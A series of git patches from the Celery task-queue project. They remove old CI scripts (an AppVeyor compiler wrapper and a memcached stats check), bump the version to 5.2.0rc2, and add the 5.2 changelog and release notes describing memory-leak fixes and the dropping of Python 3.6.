diff --git a/extra/appveyor/run_with_compiler.cmd b/extra/appveyor/run_with_compiler.cmd
deleted file mode 100644
index 31bd205ecbb..00000000000
--- a/extra/appveyor/run_with_compiler.cmd
+++ /dev/null
@@ -1,47 +0,0 @@
-:: To build extensions for 64 bit Python 3, we need to configure environment
-:: variables to use the MSVC 2010 C++ compilers from GRMSDKX_EN_DVD.iso of:
-:: MS Windows SDK for Windows 7 and .NET Framework 4 (SDK v7.1)
-::
-:: To build extensions for 64 bit Python 2, we need to configure environment
-:: variables to use the MSVC 2008 C++ compilers from GRMSDKX_EN_DVD.iso of:
-:: MS Windows SDK for Windows 7 and .NET Framework 3.5 (SDK v7.0)
-::
-:: 32 bit builds do not require specific environment configurations.
-::
-:: Note: this script needs to be run with the /E:ON and /V:ON flags for the
-:: cmd interpreter, at least for (SDK v7.0)
-::
-:: More details at:
-:: https://github.com/cython/cython/wiki/64BitCythonExtensionsOnWindows
-:: https://stackoverflow.com/a/13751649/163740
-::
-:: Author: Olivier Grisel
-:: License: CC0 1.0 Universal: https://creativecommons.org/publicdomain/zero/1.0/
-@ECHO OFF
-
-SET COMMAND_TO_RUN=%*
-SET WIN_SDK_ROOT=C:\Program Files\Microsoft SDKs\Windows
-
-SET MAJOR_PYTHON_VERSION="%PYTHON_VERSION:~0,1%"
-IF %MAJOR_PYTHON_VERSION% == "2" (
- SET WINDOWS_SDK_VERSION="v7.0"
-) ELSE IF %MAJOR_PYTHON_VERSION% == "3" (
- SET WINDOWS_SDK_VERSION="v7.1"
-) ELSE (
- ECHO Unsupported Python version: "%MAJOR_PYTHON_VERSION%"
- EXIT 1
-)
-
-IF "%PYTHON_ARCH%"=="64" (
- ECHO Configuring Windows SDK %WINDOWS_SDK_VERSION% for Python %MAJOR_PYTHON_VERSION% on a 64 bit architecture
- SET DISTUTILS_USE_SDK=1
- SET MSSdk=1
- "%WIN_SDK_ROOT%\%WINDOWS_SDK_VERSION%\Setup\WindowsSdkVer.exe" -q -version:%WINDOWS_SDK_VERSION%
- "%WIN_SDK_ROOT%\%WINDOWS_SDK_VERSION%\Bin\SetEnv.cmd" /x64 /release
- ECHO Executing: %COMMAND_TO_RUN%
- call %COMMAND_TO_RUN% || EXIT 1
-) ELSE (
- ECHO Using default MSVC build environment for 32 bit architecture
- ECHO Executing: %COMMAND_TO_RUN%
- call %COMMAND_TO_RUN% || EXIT 1
-)
From 9f649b44f699a15a5cb27e738cbef9975f581fe8 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 29 Oct 2021 22:41:28 +0600
Subject: [PATCH 100/177] not used anymore
---
extra/travis/is-memcached-running | 11 -----------
1 file changed, 11 deletions(-)
delete mode 100755 extra/travis/is-memcached-running
diff --git a/extra/travis/is-memcached-running b/extra/travis/is-memcached-running
deleted file mode 100755
index 004608663c2..00000000000
--- a/extra/travis/is-memcached-running
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/usr/bin/expect -f
-# based on https://stackoverflow.com/a/17265696/833093
-
-set destination [lindex $argv 0]
-set port [lindex $argv 1]
-
-spawn nc $destination $port
-send stats\r
-expect "END"
-send quit\r
-expect eof
From 8570b1658a1842c3e3534b93a5ad167ca3ec6673 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Fri, 29 Oct 2021 22:45:37 +0600
Subject: [PATCH 101/177] add github discussions forum
---
.github/ISSUE_TEMPLATE/Bug-Report.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/ISSUE_TEMPLATE/Bug-Report.md b/.github/ISSUE_TEMPLATE/Bug-Report.md
index 9659e4c097e..25a9be322a1 100644
--- a/.github/ISSUE_TEMPLATE/Bug-Report.md
+++ b/.github/ISSUE_TEMPLATE/Bug-Report.md
@@ -13,7 +13,7 @@ bug reports which are incomplete.
To check an item on the list replace [ ] with [x].
-->
- [ ] I have verified that the issue exists against the `master` branch of Celery.
-- [ ] This has already been asked to the [discussion group](https://groups.google.com/forum/#!forum/celery-users) first.
+- [ ] This has already been asked to the [discussions forum](https://github.com/celery/celery/discussions) first.
- [ ] I have read the relevant section in the
[contribution guide](http://docs.celeryproject.org/en/latest/contributing.html#other-bugs)
on reporting bugs.
From 0009130c9f40485092a561bf088ee44e6aa254ed Mon Sep 17 00:00:00 2001
From: Naomi Elstein
Date: Tue, 2 Nov 2021 13:32:42 +0200
Subject: [PATCH 102/177] =?UTF-8?q?Bump=20version:=205.2.0rc1=20=E2=86=92?=
=?UTF-8?q?=205.2.0rc2?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 6 +++---
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index e15f3d1d528..e30618d431d 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.0rc1
+current_version = 5.2.0rc2
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index 9f9ccaaf47c..ca8cafaa771 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0rc1 (dawn-chorus)
+:Version: 5.2.0rc2 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -57,7 +57,7 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.2.0rc1 runs on,
+Celery version 5.2.0rc2 runs on,
- Python (3.7, 3.8, 3.9, 3.10)
- PyPy3.7 (7.3+)
@@ -90,7 +90,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.5 or 5.2.0rc1 coming from previous versions then you should read our
+new to Celery 5.0.5 or 5.2.0rc2 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
diff --git a/celery/__init__.py b/celery/__init__.py
index 3757c43a725..0d40be901fe 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.0rc1'
+__version__ = '5.2.0rc2'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 7b40123da0a..9ec52bf75db 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.2.0rc1 (cliffs)
+:Version: 5.2.0rc2 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From 4033851d4b0076fed314e030fa4e5f3b9e98fef2 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Tue, 2 Nov 2021 16:09:05 +0200
Subject: [PATCH 103/177] 5.2 Release (#6939)
* Initial work.
* Add the previous release notes to the index.
* Describe memory leak fixes.
* More release notes...
* More release notes...
* More release notes...
* More release notes...
* More release notes...
* Whats new is now complete.
* Update docs/whatsnew-5.2.rst
Co-authored-by: Matus Valo
* Change IRC channel to libera chat.
* Change IRC channel to libera chat.
* Changelog...
* Beta1 changelog.
* Fix typo: version 5.2, not 5.1
* Add changelog documentation for 5.2.0b2 release
* Add changelog documentation for 5.2.0b3
* Add changelog documentation for 5.2.0rc1
* Add changelog documentation for 5.2.0rc2
* Change release-by to myself
* Update release-date of version 5.2.0rc2 now that it has been released
Co-authored-by: Asif Saif Uddin
Co-authored-by: Matus Valo
Co-authored-by: Naomi Elstein
---
Changelog.rst | 228 ++++++++--------
docs/history/changelog-5.1.rst | 139 ++++++++++
docs/history/index.rst | 2 +
docs/{ => history}/whatsnew-5.1.rst | 0
docs/includes/resources.txt | 4 +-
docs/index.rst | 2 +-
docs/whatsnew-5.2.rst | 386 ++++++++++++++++++++++++++++
7 files changed, 639 insertions(+), 122 deletions(-)
create mode 100644 docs/history/changelog-5.1.rst
rename docs/{ => history}/whatsnew-5.1.rst (100%)
create mode 100644 docs/whatsnew-5.2.rst
diff --git a/Changelog.rst b/Changelog.rst
index 5b724b1536d..d6853d97359 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -5,135 +5,125 @@
================
This document contains change notes for bugfix & new features
-in the & 5.1.x series, please see :ref:`whatsnew-5.1` for
-an overview of what's new in Celery 5.1.
+in the 5.2.x series, please see :ref:`whatsnew-5.2` for
+an overview of what's new in Celery 5.2.
-.. version-5.1.2:
+.. _version-5.2.0rc2:
-5.1.2
-=====
-:release-date: 2021-06-28 16.15 P.M UTC+3:00
-:release-by: Omer Katz
-
-- When chords fail, correctly call errbacks. (#6814)
-
- We had a special case for calling errbacks when a chord failed which
- assumed they were old style. This change ensures that we call the proper
- errback dispatch method which understands new and old style errbacks,
- and adds test to confirm that things behave as one might expect now.
-- Avoid using the ``Event.isSet()`` deprecated alias. (#6824)
-- Reintroduce sys.argv default behaviour for ``Celery.start()``. (#6825)
-
-.. version-5.1.1:
-
-5.1.1
-=====
-:release-date: 2021-06-17 16.10 P.M UTC+3:00
+5.2.0rc2
+========
+:release-date: 2021-11-02 1.54 P.M UTC+3:00
+:release-by: Naomi Elstein
+
+- Bump Python 3.10.0 to rc2.
+- [pre-commit.ci] pre-commit autoupdate (#6972).
+- autopep8.
+- Prevent worker to send expired revoked items upon hello command (#6975).
+- docs: clarify the 'keeping results' section (#6979).
+- Update deprecated task module removal in 5.0 documentation (#6981).
+- [pre-commit.ci] pre-commit autoupdate.
+- try python 3.10 GA.
+- mention python 3.10 on readme.
+- Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
+- Azure blockblob backend parametrized connection/read timeouts (#6978).
+- Add as_uri method to azure block blob backend.
+- Add possibility to override backend implementation with celeryconfig (#6879).
+- [pre-commit.ci] pre-commit autoupdate.
+- try to fix deprecation warning.
+- [pre-commit.ci] pre-commit autoupdate.
+- not needed anymore.
+- not needed anymore.
+- not used anymore.
+- add github discussions forum
+
+.. _version-5.2.0rc1:
+
+5.2.0rc1
+========
+:release-date: 2021-09-26 4.04 P.M UTC+3:00
:release-by: Omer Katz
-- Fix ``--pool=threads`` support in command line options parsing. (#6787)
-- Fix ``LoggingProxy.write()`` return type. (#6791)
-- Couchdb key is now always coerced into a string. (#6781)
-- grp is no longer imported unconditionally. (#6804)
- This fixes a regression in 5.1.0 when running Celery in non-unix systems.
-- Ensure regen utility class gets marked as done when concertised. (#6789)
-- Preserve call/errbacks of replaced tasks. (#6770)
-- Use single-lookahead for regen consumption. (#6799)
-- Revoked tasks are no longer incorrectly marked as retried. (#6812, #6816)
-
-.. version-5.1.0:
-
-5.1.0
-=====
-:release-date: 2021-05-23 19.20 P.M UTC+3:00
+- Kill all workers when main process exits in prefork model (#6942).
+- test kombu 5.2.0rc1 (#6947).
+- try moto 2.2.x (#6948).
+- Prepared Hacker News Post on Release Action.
+- update setup with python 3.7 as minimum.
+- update kombu on setupcfg.
+- Added note about automatic killing all child processes of worker after its termination.
+- [pre-commit.ci] pre-commit autoupdate.
+- Move importskip before greenlet import (#6956).
+- amqp: send expiration field to broker if requested by user (#6957).
+- Single line drift warning.
+- canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
+- Allow to enable Events with app.conf mechanism.
+- Warn when expiration date is in the past.
+- Add the Framework :: Celery trove classifier.
+- Give indication whether the task is replacing another (#6916).
+- Make setup.py executable.
+- Bump version: 5.2.0b3 → 5.2.0rc1.
+
+.. _version-5.2.0b3:
+
+5.2.0b3
+=======
+:release-date: 2021-09-02 8.38 P.M UTC+3:00
:release-by: Omer Katz
-- ``celery -A app events -c camera`` now works as expected. (#6774)
-- Bump minimum required Kombu version to 5.1.0.
-
-.. _version-5.1.0rc1:
-
-5.1.0rc1
-========
-:release-date: 2021-05-02 16.06 P.M UTC+3:00
+- Add args to LOG_RECEIVED (fixes #6885) (#6898).
+- Terminate job implementation for eventlet concurrency backend (#6917).
+- Add cleanup implementation to filesystem backend (#6919).
+- [pre-commit.ci] pre-commit autoupdate (#69).
+- Add before_start hook (fixes #4110) (#6923).
+- Restart consumer if connection drops (#6930).
+- Remove outdated optimization documentation (#6933).
+- added https verification check functionality in arangodb backend (#6800).
+- Drop Python 3.6 support.
+- update supported python versions on readme.
+- [pre-commit.ci] pre-commit autoupdate (#6935).
+- Remove appveyor configuration since we migrated to GA.
+- pyupgrade is now set to upgrade code to 3.7.
+- Drop exclude statement since we no longer test with pypy-3.6.
+- 3.10 is not GA so it's not supported yet.
+- Celery 5.1 or earlier support Python 3.6.
+- Fix linting error.
+- fix: Pass a Context when chaining fail results (#6899).
+- Bump version: 5.2.0b2 → 5.2.0b3.
+
+.. _version-5.2.0b2:
+
+5.2.0b2
+=======
+:release-date: 2021-08-17 5.35 P.M UTC+3:00
:release-by: Omer Katz
-- Celery Mailbox accept and serializer parameters are initialized from configuration. (#6757)
-- Error propagation and errback calling for group-like signatures now works as expected. (#6746)
-- Fix sanitization of passwords in sentinel URIs. (#6765)
-- Add LOG_RECEIVED to customize logging. (#6758)
+- Test windows on py3.10rc1 and pypy3.7 (#6868).
+- Route chord_unlock task to the same queue as chord body (#6896).
+- Add message properties to app.tasks.Context (#6818).
+- handle already converted LogLevel and JSON (#6915).
+- 5.2 is codenamed dawn-chorus.
+- Bump version: 5.2.0b1 → 5.2.0b2.
-.. _version-5.1.0b2:
+.. _version-5.2.0b1:
-5.1.0b2
+5.2.0b1
=======
-:release-date: 2021-05-02 16.06 P.M UTC+3:00
+:release-date: 2021-08-11 5.42 P.M UTC+3:00
:release-by: Omer Katz
-- Fix the behavior of our json serialization which regressed in 5.0. (#6561)
-- Add support for SQLAlchemy 1.4. (#6709)
-- Safeguard against schedule entry without kwargs. (#6619)
-- ``task.apply_async(ignore_result=True)`` now avoids persisting the results. (#6713)
-- Update systemd tmpfiles path. (#6688)
-- Ensure AMQPContext exposes an app attribute. (#6741)
-- Inspect commands accept arguments again (#6710).
-- Chord counting of group children is now accurate. (#6733)
-- Add a setting :setting:`worker_cancel_long_running_tasks_on_connection_loss`
- to terminate tasks with late acknowledgement on connection loss. (#6654)
-- The ``task-revoked`` event and the ``task_revoked`` signal are not duplicated
- when ``Request.on_failure`` is called. (#6654)
-- Restore pickling support for ``Retry``. (#6748)
-- Add support in the redis result backend for authenticating with a username. (#6750)
-- The :setting:`worker_pool` setting is now respected correctly. (#6711)
-
-.. _version-5.1.0b1:
-
-5.1.0b1
-=======
-:release-date: 2021-04-02 10.25 P.M UTC+6:00
-:release-by: Asif Saif Uddin
-
-- Add sentinel_kwargs to Redis Sentinel docs.
-- Depend on the maintained python-consul2 library. (#6544).
-- Use result_chord_join_timeout instead of hardcoded default value.
-- Upgrade AzureBlockBlob storage backend to use Azure blob storage library v12 (#6580).
-- Improved integration tests.
-- pass_context for handle_preload_options decorator (#6583).
-- Makes regen less greedy (#6589).
-- Pytest worker shutdown timeout (#6588).
-- Exit celery with non zero exit value if failing (#6602).
-- Raise BackendStoreError when set value is too large for Redis.
-- Trace task optimizations are now set via Celery app instance.
-- Make trace_task_ret and fast_trace_task public.
-- reset_worker_optimizations and create_request_cls has now app as optional parameter.
-- Small refactor in exception handling of on_failure (#6633).
-- Fix for issue #5030 "Celery Result backend on Windows OS".
-- Add store_eager_result setting so eager tasks can store result on the result backend (#6614).
-- Allow heartbeats to be sent in tests (#6632).
-- Fixed default visibility timeout note in sqs documentation.
-- Support Redis Sentinel with SSL.
-- Simulate more exhaustive delivery info in apply().
-- Start chord header tasks as soon as possible (#6576).
-- Forward shadow option for retried tasks (#6655).
-- --quiet flag now actually makes celery avoid producing logs (#6599).
-- Update platforms.py "superuser privileges" check (#6600).
-- Remove unused property `autoregister` from the Task class (#6624).
-- fnmatch.translate() already translates globs for us. (#6668).
-- Upgrade some syntax to Python 3.6+.
-- Add `azureblockblob_base_path` config (#6669).
-- Fix checking expiration of X.509 certificates (#6678).
-- Drop the lzma extra.
-- Fix JSON decoding errors when using MongoDB as backend (#6675).
-- Allow configuration of RedisBackend's health_check_interval (#6666).
-- Safeguard against schedule entry without kwargs (#6619).
-- Docs only - SQS broker - add STS support (#6693) through kombu.
-- Drop fun_accepts_kwargs backport.
-- Tasks can now have required kwargs at any order (#6699).
-- Min py-amqp 5.0.6.
-- min billiard is now 3.6.4.0.
-- Minimum kombu now is5.1.0b1.
-- Numerous docs fixes.
-- Moved CI to github action.
-- Updated deployment scripts.
-- Updated docker.
-- Initial support of python 3.9 added.
+- Add Python 3.10 support (#6807).
+- Fix docstring for Signal.send to match code (#6835).
+- No blank line in log output (#6838).
+- Chords get body_type independently to handle cases where body.type does not exist (#6847).
+- Fix #6844 by allowing safe queries via app.inspect().active() (#6849).
+- Fix multithreaded backend usage (#6851).
+- Fix Open Collective donate button (#6848).
+- Fix setting worker concurrency option after signal (#6853).
+- Make ResultSet.on_ready promise hold a weakref to self (#6784).
+- Update configuration.rst.
+- Discard jobs on flush if synack isn't enabled (#6863).
+- Bump click version to 8.0 (#6861).
+- Amend IRC network link to Libera (#6837).
+- Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872).
+- Fix inspect --json output to return valid json without --quiet.
+- Remove celery.task references in modules, docs (#6869).
+- The Consul backend must correctly associate requests and responses (#6823).
diff --git a/docs/history/changelog-5.1.rst b/docs/history/changelog-5.1.rst
new file mode 100644
index 00000000000..5b724b1536d
--- /dev/null
+++ b/docs/history/changelog-5.1.rst
@@ -0,0 +1,139 @@
+.. _changelog:
+
+================
+ Change history
+================
+
+This document contains change notes for bugfix & new features
+in the 5.1.x series, please see :ref:`whatsnew-5.1` for
+an overview of what's new in Celery 5.1.
+
+.. version-5.1.2:
+
+5.1.2
+=====
+:release-date: 2021-06-28 16.15 P.M UTC+3:00
+:release-by: Omer Katz
+
+- When chords fail, correctly call errbacks. (#6814)
+
+ We had a special case for calling errbacks when a chord failed which
+ assumed they were old style. This change ensures that we call the proper
+ errback dispatch method which understands new and old style errbacks,
+ and adds test to confirm that things behave as one might expect now.
+- Avoid using the ``Event.isSet()`` deprecated alias. (#6824)
+- Reintroduce sys.argv default behaviour for ``Celery.start()``. (#6825)
+
+.. version-5.1.1:
+
+5.1.1
+=====
+:release-date: 2021-06-17 16.10 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Fix ``--pool=threads`` support in command line options parsing. (#6787)
+- Fix ``LoggingProxy.write()`` return type. (#6791)
+- Couchdb key is now always coerced into a string. (#6781)
+- grp is no longer imported unconditionally. (#6804)
+ This fixes a regression in 5.1.0 when running Celery in non-unix systems.
+- Ensure regen utility class gets marked as done when concertised. (#6789)
+- Preserve call/errbacks of replaced tasks. (#6770)
+- Use single-lookahead for regen consumption. (#6799)
+- Revoked tasks are no longer incorrectly marked as retried. (#6812, #6816)
+
+.. version-5.1.0:
+
+5.1.0
+=====
+:release-date: 2021-05-23 19.20 P.M UTC+3:00
+:release-by: Omer Katz
+
+- ``celery -A app events -c camera`` now works as expected. (#6774)
+- Bump minimum required Kombu version to 5.1.0.
+
+.. _version-5.1.0rc1:
+
+5.1.0rc1
+========
+:release-date: 2021-05-02 16.06 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Celery Mailbox accept and serializer parameters are initialized from configuration. (#6757)
+- Error propagation and errback calling for group-like signatures now works as expected. (#6746)
+- Fix sanitization of passwords in sentinel URIs. (#6765)
+- Add LOG_RECEIVED to customize logging. (#6758)
+
+.. _version-5.1.0b2:
+
+5.1.0b2
+=======
+:release-date: 2021-05-02 16.06 P.M UTC+3:00
+:release-by: Omer Katz
+
+- Fix the behavior of our json serialization which regressed in 5.0. (#6561)
+- Add support for SQLAlchemy 1.4. (#6709)
+- Safeguard against schedule entry without kwargs. (#6619)
+- ``task.apply_async(ignore_result=True)`` now avoids persisting the results. (#6713)
+- Update systemd tmpfiles path. (#6688)
+- Ensure AMQPContext exposes an app attribute. (#6741)
+- Inspect commands accept arguments again (#6710).
+- Chord counting of group children is now accurate. (#6733)
+- Add a setting :setting:`worker_cancel_long_running_tasks_on_connection_loss`
+ to terminate tasks with late acknowledgement on connection loss. (#6654)
+- The ``task-revoked`` event and the ``task_revoked`` signal are not duplicated
+ when ``Request.on_failure`` is called. (#6654)
+- Restore pickling support for ``Retry``. (#6748)
+- Add support in the redis result backend for authenticating with a username. (#6750)
+- The :setting:`worker_pool` setting is now respected correctly. (#6711)
+
+.. _version-5.1.0b1:
+
+5.1.0b1
+=======
+:release-date: 2021-04-02 10.25 P.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Add sentinel_kwargs to Redis Sentinel docs.
+- Depend on the maintained python-consul2 library. (#6544).
+- Use result_chord_join_timeout instead of hardcoded default value.
+- Upgrade AzureBlockBlob storage backend to use Azure blob storage library v12 (#6580).
+- Improved integration tests.
+- pass_context for handle_preload_options decorator (#6583).
+- Makes regen less greedy (#6589).
+- Pytest worker shutdown timeout (#6588).
+- Exit celery with non zero exit value if failing (#6602).
+- Raise BackendStoreError when set value is too large for Redis.
+- Trace task optimizations are now set via Celery app instance.
+- Make trace_task_ret and fast_trace_task public.
+- reset_worker_optimizations and create_request_cls has now app as optional parameter.
+- Small refactor in exception handling of on_failure (#6633).
+- Fix for issue #5030 "Celery Result backend on Windows OS".
+- Add store_eager_result setting so eager tasks can store result on the result backend (#6614).
+- Allow heartbeats to be sent in tests (#6632).
+- Fixed default visibility timeout note in sqs documentation.
+- Support Redis Sentinel with SSL.
+- Simulate more exhaustive delivery info in apply().
+- Start chord header tasks as soon as possible (#6576).
+- Forward shadow option for retried tasks (#6655).
+- --quiet flag now actually makes celery avoid producing logs (#6599).
+- Update platforms.py "superuser privileges" check (#6600).
+- Remove unused property `autoregister` from the Task class (#6624).
+- fnmatch.translate() already translates globs for us. (#6668).
+- Upgrade some syntax to Python 3.6+.
+- Add `azureblockblob_base_path` config (#6669).
+- Fix checking expiration of X.509 certificates (#6678).
+- Drop the lzma extra.
+- Fix JSON decoding errors when using MongoDB as backend (#6675).
+- Allow configuration of RedisBackend's health_check_interval (#6666).
+- Safeguard against schedule entry without kwargs (#6619).
+- Docs only - SQS broker - add STS support (#6693) through kombu.
+- Drop fun_accepts_kwargs backport.
+- Tasks can now have required kwargs at any order (#6699).
+- Min py-amqp 5.0.6.
+- min billiard is now 3.6.4.0.
+- Minimum kombu now is 5.1.0b1.
+- Numerous docs fixes.
+- Moved CI to github action.
+- Updated deployment scripts.
+- Updated docker.
+- Initial support of python 3.9 added.
diff --git a/docs/history/index.rst b/docs/history/index.rst
index 88e30c0a2b0..35423550084 100644
--- a/docs/history/index.rst
+++ b/docs/history/index.rst
@@ -13,6 +13,8 @@ version please visit :ref:`changelog`.
.. toctree::
:maxdepth: 2
+ whatsnew-5.1
+ changelog-5.1
whatsnew-5.0
changelog-5.0
whatsnew-4.4
diff --git a/docs/whatsnew-5.1.rst b/docs/history/whatsnew-5.1.rst
similarity index 100%
rename from docs/whatsnew-5.1.rst
rename to docs/history/whatsnew-5.1.rst
diff --git a/docs/includes/resources.txt b/docs/includes/resources.txt
index 1afe96e546d..07681a464d7 100644
--- a/docs/includes/resources.txt
+++ b/docs/includes/resources.txt
@@ -18,10 +18,10 @@ please join the `celery-users`_ mailing list.
IRC
---
-Come chat with us on IRC. The **#celery** channel is located at the `Freenode`_
+Come chat with us on IRC. The **#celery** channel is located at the `Libera Chat`_
network.
-.. _`Freenode`: https://freenode.net
+.. _`Libera Chat`: https://libera.chat
.. _bug-tracker:
diff --git a/docs/index.rst b/docs/index.rst
index 6b93a9d23fc..915b7c088aa 100644
--- a/docs/index.rst
+++ b/docs/index.rst
@@ -58,7 +58,7 @@ Contents
tutorials/index
faq
changelog
- whatsnew-5.1
+ whatsnew-5.2
reference/index
internals/index
history/index
diff --git a/docs/whatsnew-5.2.rst b/docs/whatsnew-5.2.rst
new file mode 100644
index 00000000000..f1f60743cf8
--- /dev/null
+++ b/docs/whatsnew-5.2.rst
@@ -0,0 +1,386 @@
+.. _whatsnew-5.2:
+
+=========================================
+ What's new in Celery 5.2 (Dawn Chorus)
+=========================================
+:Author: Omer Katz (``omer.drow at gmail.com``)
+
+.. sidebar:: Change history
+
+ What's new documents describe the changes in major versions,
+ we also have a :ref:`changelog` that lists the changes in bugfix
+ releases (0.0.x), while older series are archived under the :ref:`history`
+ section.
+
+Celery is a simple, flexible, and reliable distributed programming framework
+to process vast amounts of messages, while providing operations with
+the tools required to maintain a distributed system with python.
+
+It's a task queue with focus on real-time processing, while also
+supporting task scheduling.
+
+Celery has a large and diverse community of users and contributors,
+you should come join us :ref:`on IRC <irc-channel>`
+or :ref:`our mailing-list <mailing-list>`.
+
+.. note::
+
+ Following the problems with Freenode, we migrated our IRC channel to Libera Chat
+ as most projects did.
+ You can also join us using `Gitter `_.
+
+ We're sometimes there to answer questions. We welcome you to join.
+
+To read more about Celery you should go read the :ref:`introduction `.
+
+While this version is **mostly** backward compatible with previous versions
+it's important that you read the following section as this release
+is a new major version.
+
+This version is officially supported on CPython 3.7 & 3.8 & 3.9
+and is also supported on PyPy3.
+
+.. _`website`: http://celeryproject.org/
+
+.. topic:: Table of Contents
+
+ Make sure you read the important notes before upgrading to this version.
+
+.. contents::
+ :local:
+ :depth: 2
+
+Preface
+=======
+
+.. note::
+
+ **This release contains fixes for two (potentially severe) memory leaks.
+ We encourage our users to upgrade to this release as soon as possible.**
+
+The 5.2.0 release is a new minor release for Celery.
+
+Releases in the 5.x series are codenamed after songs of `Jon Hopkins `_.
+This release has been codenamed `Dawn Chorus `_.
+
+From now on we only support Python 3.7 and above.
+We will maintain compatibility with Python 3.7 until it's
+EOL in June, 2023.
+
+*— Omer Katz*
+
+Long Term Support Policy
+------------------------
+
+We no longer support Celery 4.x as we don't have the resources to do so.
+If you'd like to help us, all contributions are welcome.
+
+Celery 5.x **is not** an LTS release. We will support it until the release
+of Celery 6.x.
+
+We're in the process of defining our Long Term Support policy.
+Watch the next "What's New" document for updates.
+
+Wall of Contributors
+--------------------
+
+.. note::
+
+ This wall was automatically generated from git history,
+ so sadly it doesn't include the people who help with more important
+ things like answering mailing-list questions.
+
+Upgrading from Celery 4.x
+=========================
+
+Step 1: Adjust your command line invocation
+-------------------------------------------
+
+Celery 5.0 introduces a new CLI implementation which isn't completely backwards compatible.
+
+The global options can no longer be positioned after the sub-command.
+Instead, they must be positioned as an option for the `celery` command like so::
+
+ celery --app path.to.app worker
+
+If you were using our :ref:`daemonizing` guide to deploy Celery in production,
+you should revisit it for updates.
+
+Step 2: Update your configuration with the new setting names
+------------------------------------------------------------
+
+If you haven't already updated your configuration when you migrated to Celery 4.0,
+please do so now.
+
+We elected to extend the deprecation period until 6.0 since
+we did not loudly warn about using these deprecated settings.
+
+Please refer to the :ref:`migration guide ` for instructions.
+
+Step 3: Read the important notes in this document
+-------------------------------------------------
+
+Make sure you are not affected by any of the important upgrade notes
+mentioned in the :ref:`following section `.
+
+You should verify that none of the breaking changes in the CLI
+affect you. Please refer to :ref:`New Command Line Interface ` for details.
+
+Step 4: Migrate your code to Python 3
+-------------------------------------
+
+Celery 5.x only supports Python 3. Therefore, you must ensure your code is
+compatible with Python 3.
+
+If you haven't ported your code to Python 3, you must do so before upgrading.
+
+You can use tools like `2to3 `_
+and `pyupgrade `_ to assist you with
+this effort.
+
+After the migration is done, run your test suite with Celery 4 to ensure
+nothing has been broken.
+
+Step 5: Upgrade to Celery 5.2
+-----------------------------
+
+At this point you can upgrade your workers and clients with the new version.
+
+.. _v520-important:
+
+Important Notes
+===============
+
+Supported Python Versions
+-------------------------
+
+The supported Python versions are:
+
+- CPython 3.7
+- CPython 3.8
+- CPython 3.9
+- PyPy3.7 7.3 (``pypy3``)
+
+Experimental support
+~~~~~~~~~~~~~~~~~~~~
+
+Celery supports these Python versions provisionally as they are not production
+ready yet:
+
+- CPython 3.10 (currently in RC2)
+
+Memory Leak Fixes
+-----------------
+
+Two severe memory leaks have been fixed in this version:
+
+* :class:`celery.result.ResultSet` no longer holds a circular reference to itself.
+* The prefork pool no longer keeps messages in its cache forever when the master
+ process disconnects from the broker.
+
+The first memory leak occurs when you use :class:`celery.result.ResultSet`.
+Each instance held a promise which provides that instance as an argument to
+the promise's callable.
+This caused a circular reference which kept the ResultSet instance in memory
+forever since the GC couldn't evict it.
+The provided argument is now a :func:`weakref.proxy` of the ResultSet's
+instance.
+The memory leak mainly occurs when you use :class:`celery.result.GroupResult`
+since it inherits from :class:`celery.result.ResultSet` which doesn't get used
+that often.
+
+The second memory leak exists since the inception of the project.
+The prefork pool maintains a cache of the jobs it executes.
+When they are complete, they are evicted from the cache.
+However, when Celery disconnects from the broker, we flush the pool
+and discard the jobs, expecting that they'll be cleared later once the worker
+acknowledges them but that has never been the case.
+Instead, these jobs remain forever in memory.
+We now discard those jobs immediately while flushing.
+
+Dropped support for Python 3.6
+------------------------------
+
+Celery now requires Python 3.7 and above.
+
+Python 3.6 will reach EOL in December, 2021.
+In order to focus our efforts we have dropped support for Python 3.6 in
+this version.
+
+If you still require to run Celery using Python 3.6
+you can still use Celery 5.1.
+However we encourage you to upgrade to a supported Python version since
+no further security patches will be applied for Python 3.6 after
+the 23rd of December, 2021.
+
+Tasks
+-----
+
+When replacing a task with another task, we now give an indication of the
+replacing nesting level through the ``replaced_task_nesting`` header.
+
+A task which was never replaced has a ``replaced_task_nesting`` value of 0.
+
+Kombu
+-----
+
+Starting from v5.2, the minimum required version is Kombu 5.2.0.
